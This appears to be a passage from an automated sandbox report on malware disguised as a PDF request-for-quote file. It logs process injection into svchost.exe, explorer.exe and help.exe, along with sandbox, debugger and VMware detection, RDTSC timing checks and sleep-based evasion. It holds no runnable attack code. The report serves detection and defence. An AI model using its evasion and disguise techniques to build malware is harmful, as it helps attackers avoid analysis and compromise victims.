          Source: Binary string: wntdll.pdbUGP source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A60A76 push ecx; ret 0_2_00A60A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417933 push esi; ret 2_2_00417934
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E9AD push dword ptr [D2425A3Fh]; ret 2_2_0041E9CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B48 push ebp; retf 2_2_00416B63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409BA9 push ecx; ret 2_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409BA9 push ecx; ret 2_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4D2 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4DB push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D485 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D70 push ebx; ret 2_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D53C push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D9A push ebx; ret 2_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DEB1E push esp; retn 0000h2_2_029DEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DEB02 push esp; retn 0000h2_2_029DEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DE9B5 push esp; retn 0000h2_2_029DEAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_087FCB1E push esp; retn 0000h3_2_087FCB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_087FCB02 push esp; retn 0000h3_2_087FCB03
          Source: C:\Windows\explorer.exeCode function: 3_2_087FC9B5 push esp; retn 0000h3_2_087FCAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_109899B5 push esp; retn 0000h3_2_10989AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10989B1E push esp; retn 0000h3_2_10989B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10989B02 push esp; retn 0000h3_2_10989B03
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C225F pushad ; ret 5_2_034C27F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C27FA pushad ; ret 5_2_034C27F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F09AD push ecx; mov dword ptr [esp], ecx5_2_034F09B6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C283D push eax; iretd 5_2_034C2858
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB0000 push cs; iretd 5_2_02CB0003
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD4DB push eax; ret 5_2_02CCD542
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD4D2 push eax; ret 5_2_02CCD4D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD485 push eax; ret 5_2_02CCD4D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD53C push eax; ret 5_2_02CCD542
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A5F98E
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AD1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00AD1C41
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96893
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeAPI/Special instruction interceptor: Address: 141EF24
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 2CB9904 second address: 2CB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 2CB9B7E second address: 2CB9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9768Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 9738Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeAPI coverage: 3.4 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.3 %
          Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.3 %
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep count: 9768 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep time: -19536000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep count: 173 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep time: -346000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep count: 235 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep time: -470000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep count: 9738 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep time: -19476000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7C2A2 FindFirstFileExW,0_2_00A7C2A2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB68EE FindFirstFileW,FindClose,0_2_00AB68EE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00AB698F
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD076
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD3A9
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB9642
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB979D
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADBBE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00AB9B2B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00AB5C97
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000003.00000002.4776588202.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000003.00000000.2348289293.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABEAA2 BlockInput,0_2_00ABEAA2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A72622
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A64CE8 mov eax, dword ptr fs:[00000030h]0_2_00A64CE8
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141F1F0 mov eax, dword ptr fs:[00000030h]0_2_0141F1F0
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141F190 mov eax, dword ptr fs:[00000030h]0_2_0141F190
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_0141DB50 mov eax, dword ptr fs:[00000030h]0_2_0141DB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D mov eax, dword ptr fs:[00000030h]2_2_032F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D mov eax, dword ptr fs:[00000030h]2_2_032F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F32A mov eax, dword ptr fs:[00000030h]2_2_0325F32A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03227330 mov eax, dword ptr fs:[00000030h]2_2_03227330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B930B mov eax, dword ptr fs:[00000030h]2_2_032B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B930B mov eax, dword ptr fs:[00000030h]2_2_032B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B930B mov eax, dword ptr fs:[00000030h]2_2_032B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF367 mov eax, dword ptr fs:[00000030h]2_2_032EF367
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237370 mov eax, dword ptr fs:[00000030h]2_2_03237370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237370 mov eax, dword ptr fs:[00000030h]2_2_03237370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237370 mov eax, dword ptr fs:[00000030h]2_2_03237370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C mov eax, dword ptr fs:[00000030h]2_2_0322D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C mov eax, dword ptr fs:[00000030h]2_2_0322D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305341 mov eax, dword ptr fs:[00000030h]2_2_03305341
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229353 mov eax, dword ptr fs:[00000030h]2_2_03229353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229353 mov eax, dword ptr fs:[00000030h]2_2_03229353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032533A5 mov eax, dword ptr fs:[00000030h]2_2_032533A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032633A0 mov eax, dword ptr fs:[00000030h]2_2_032633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032633A0 mov eax, dword ptr fs:[00000030h]2_2_032633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330539D mov eax, dword ptr fs:[00000030h]2_2_0330539D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A mov eax, dword ptr fs:[00000030h]2_2_0328739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A mov eax, dword ptr fs:[00000030h]2_2_0328739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF3E6 mov eax, dword ptr fs:[00000030h]2_2_032EF3E6
